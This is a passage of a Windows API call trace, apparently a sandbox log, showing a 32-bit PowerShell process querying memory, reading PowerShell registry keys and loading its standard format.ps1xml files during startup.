	[0156.562] VirtualQuery (in: lpAddress=0x10d5d8, lpBuffer=0x10e5d8, dwLength=0x1c | out: lpBuffer=0x10e5d8*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.562] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.563] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0157.844] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0157.844] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0157.845] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.149] GetLastError () returned 0xcb
	[0158.217] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.231] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.231] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.232] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.232] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.234] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.234] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.238] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.241] VirtualQuery (in: lpAddress=0x10d5d4, lpBuffer=0x10e5d4, dwLength=0x1c | out: lpBuffer=0x10e5d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.249] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e75c | out: phkResult=0x10e75c*=0x348) returned 0x0
	[0158.249] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x10e7c4, lpData=0x0, lpcbData=0x10e7c0*=0x0 | out: lpType=0x10e7c4*=0x1, lpData=0x0, lpcbData=0x10e7c0*=0x74) returned 0x0
	[0158.250] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x10e7a4, lpData=0x0, lpcbData=0x10e7a0*=0x0 | out: lpType=0x10e7a4*=0x1, lpData=0x0, lpcbData=0x10e7a0*=0x74) returned 0x0
	[0158.250] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x10e7a4, lpData=0x584bc0, lpcbData=0x10e7a0*=0x74 | out: lpType=0x10e7a4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x10e7a0*=0x74) returned 0x0
	[0158.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x10e324, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0158.250] GetLastError () returned 0xcb
	[0158.250] SetErrorMode (uMode=0x1) returned 0x1
	[0158.250] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x10e7a4 | out: lpFileInformation=0x10e7a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0158.250] GetLastError () returned 0xcb
	[0158.250] SetErrorMode (uMode=0x1) returned 0x1
	[0158.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.255] GetLastError () returned 0xcb
	[0158.255] SetErrorMode (uMode=0x1) returned 0x1
	[0158.255] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10e798 | out: lpFileInformation=0x10e798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0158.255] GetLastError () returned 0xcb
	[0158.255] SetErrorMode (uMode=0x1) returned 0x1
	[0158.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0158.255] GetLastError () returned 0xcb
	[0158.255] SetErrorMode (uMode=0x1) returned 0x1
	[0158.255] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10e798 | out: lpFileInformation=0x10e798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0158.256] GetLastError () returned 0xcb
	[0158.256] SetErrorMode (uMode=0x1) returned 0x1
	[0158.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.256] GetLastError () returned 0xcb
	[0158.256] SetErrorMode (uMode=0x1) returned 0x1
	[0158.256] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10e798 | out: lpFileInformation=0x10e798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0158.256] GetLastError () returned 0xcb
	[0158.256] SetErrorMode (uMode=0x1) returned 0x1
	[0158.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.256] GetLastError () returned 0xcb
	[0158.256] SetErrorMode (uMode=0x1) returned 0x1
	[0158.256] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10e798 | out: lpFileInformation=0x10e798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0158.257] GetLastError () returned 0xcb
	[0158.257] SetErrorMode (uMode=0x1) returned 0x1
	[0158.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0158.257] GetLastError () returned 0xcb
	[0158.257] SetErrorMode (uMode=0x1) returned 0x1
	[0158.257] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10e798 | out: lpFileInformation=0x10e798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0158.257] GetLastError () returned 0xcb
	[0158.257] SetErrorMode (uMode=0x1) returned 0x1
	[0158.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0158.257] GetLastError () returned 0xcb
	[0158.257] SetErrorMode (uMode=0x1) returned 0x1
	[0158.257] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10e798 | out: lpFileInformation=0x10e798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0158.257] GetLastError () returned 0xcb
	[0158.258] SetErrorMode (uMode=0x1) returned 0x1
	[0158.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0158.258] GetLastError () returned 0xcb
	[0158.258] SetErrorMode (uMode=0x1) returned 0x1
	[0158.258] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10e798 | out: lpFileInformation=0x10e798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0158.258] GetLastError () returned 0xcb
	[0158.258] SetErrorMode (uMode=0x1) returned 0x1
	[0158.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0158.258] GetLastError () returned 0xcb
	[0158.258] SetErrorMode (uMode=0x1) returned 0x1
	[0158.258] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10e798 | out: lpFileInformation=0x10e798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0158.258] GetLastError () returned 0xcb
	[0158.258] SetErrorMode (uMode=0x1) returned 0x1
	[0158.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0158.259] GetLastError () returned 0xcb
	[0158.259] SetErrorMode (uMode=0x1) returned 0x1
	[0158.259] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10e798 | out: lpFileInformation=0x10e798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0158.259] GetLastError () returned 0xcb
	[0158.259] SetErrorMode (uMode=0x1) returned 0x1
	[0158.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.261] GetLastError () returned 0xcb
	[0158.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.460] GetLastError () returned 0xcb
	[0158.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.461] GetLastError () returned 0xcb
	[0158.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.462] GetLastError () returned 0xcb
	[0158.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.463] GetLastError () returned 0xcb
	[0158.463] SetErrorMode (uMode=0x1) returned 0x1
	[0158.463] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0158.463] GetLastError () returned 0x0
	[0158.463] GetFileType (hFile=0x31c) returned 0x1
	[0158.463] SetErrorMode (uMode=0x1) returned 0x1
	[0158.463] GetFileType (hFile=0x31c) returned 0x1
	[0158.464] ReadFile (in: hFile=0x31c, lpBuffer=0x2cbe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2cbe5ec*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0158.985] GetLastError () returned 0x0
	[0158.987] ReadFile (in: hFile=0x31c, lpBuffer=0x2cbe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2cbe5ec*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0158.987] GetLastError () returned 0x0
	[0158.988] ReadFile (in: hFile=0x31c, lpBuffer=0x2cbe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2cbe5ec*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0158.988] GetLastError () returned 0x0
	[0158.988] ReadFile (in: hFile=0x31c, lpBuffer=0x2cbe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2cbe5ec*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0158.988] GetLastError () returned 0x0
	[0158.988] ReadFile (in: hFile=0x31c, lpBuffer=0x2cbe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2cbe5ec*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0158.988] GetLastError () returned 0x0
	[0158.988] ReadFile (in: hFile=0x31c, lpBuffer=0x2cbe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2cbe5ec*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0158.989] GetLastError () returned 0x0
	[0158.989] ReadFile (in: hFile=0x31c, lpBuffer=0x2cbe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2cbe5ec*, lpNumberOfBytesRead=0x10e614*=0x9e2, lpOverlapped=0x0) returned 1
	[0158.989] GetLastError () returned 0x0
	[0158.989] ReadFile (in: hFile=0x31c, lpBuffer=0x2cbdb6e, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2cbdb6e*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0158.989] GetLastError () returned 0x0
	[0158.989] ReadFile (in: hFile=0x31c, lpBuffer=0x2cbe5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2cbe5ec*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0158.989] GetLastError () returned 0x0
	[0158.989] CloseHandle (hObject=0x31c) returned 1
	[0158.995] GetLastError () returned 0x0
	[0158.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.995] GetLastError () returned 0x0
	[0158.995] SetErrorMode (uMode=0x1) returned 0x1
	[0158.995] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ccf6a8 | out: lpFileInformation=0x2ccf6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0159.075] GetLastError () returned 0x0
	[0159.075] SetErrorMode (uMode=0x1) returned 0x1
	[0159.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.075] GetLastError () returned 0x0
	[0159.075] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e598 | out: phkResult=0x10e598*=0x31c) returned 0x0
	[0159.075] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x0, lpcbData=0x10e5dc*=0x0 | out: lpType=0x10e5e0*=0x1, lpData=0x0, lpcbData=0x10e5dc*=0x56) returned 0x0
	[0159.076] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x584bc0, lpcbData=0x10e5dc*=0x56 | out: lpType=0x10e5e0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e5dc*=0x56) returned 0x0
	[0159.076] RegCloseKey (hKey=0x31c) returned 0x0
	[0159.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.076] GetLastError () returned 0x0
	[0159.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.076] GetLastError () returned 0x0
	[0159.088] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x1d9cfc53, Data2=0xf43c, Data3=0x42bc, Data4=([0]=0xbe, [1]=0x10, [2]=0x6b, [3]=0x48, [4]=0x76, [5]=0xff, [6]=0xc5, [7]=0x34))) returned 0x0
	[0159.191] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xab2e4dca, Data2=0xf2d6, Data3=0x4e26, Data4=([0]=0x87, [1]=0x89, [2]=0x8, [3]=0xb1, [4]=0x57, [5]=0xc9, [6]=0x44, [7]=0x24))) returned 0x0
	[0159.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.193] GetLastError () returned 0x0
	[0159.193] SetErrorMode (uMode=0x1) returned 0x1
	[0159.193] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0159.193] GetLastError () returned 0x0
	[0159.193] GetFileType (hFile=0x31c) returned 0x1
	[0159.193] SetErrorMode (uMode=0x1) returned 0x1
	[0159.193] GetFileType (hFile=0x31c) returned 0x1
	[0159.194] ReadFile (in: hFile=0x31c, lpBuffer=0x2ce2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce2990*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0159.194] GetLastError () returned 0x0
